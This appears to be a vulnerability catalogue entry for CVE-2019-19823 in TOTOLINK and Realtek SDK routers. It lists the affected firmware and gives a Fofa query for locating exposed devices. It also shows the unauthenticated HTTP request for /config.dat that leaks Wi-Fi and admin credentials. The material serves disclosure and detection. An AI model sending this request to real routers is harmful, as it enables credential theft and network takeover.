| Title | TOTOLINK/Realtek Routers - Information Disclosure |
|---|---|
| Author | ritikchaddha |
| Severity | High |
| Impact | Unauthenticated attackers can retrieve the entire router configuration including Wi-Fi passwords, admin credentials, and network settings, enabling complete network takeover. |
| Remediation | Upgrade to firmware versions beyond those listed as vulnerable, or replace affected devices with patched alternatives. |
| CVSS Score | 7.5 |
| EPSS Score | 0.33866 |
| CVE ID | CVE-2019-19823 |
| CWE ID | CWE-306 |
| Fofa Query | title="totolink" |
| Tags | cve cve2019 totolink realtek exposure config boa |
A certain router administration interface using Realtek APMIB (e.g., on TOTOLINK models) allows unauthenticated remote attackers to disclose the entire router configuration, including sensitive credentials, via accessing the “config.dat” file. Affected devices include TOTOLINK A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, N100RE through 3.4.0, and other Realtek SDK-based devices.
GET /config.dat HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-19823.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-19823.pcap
N/AN/A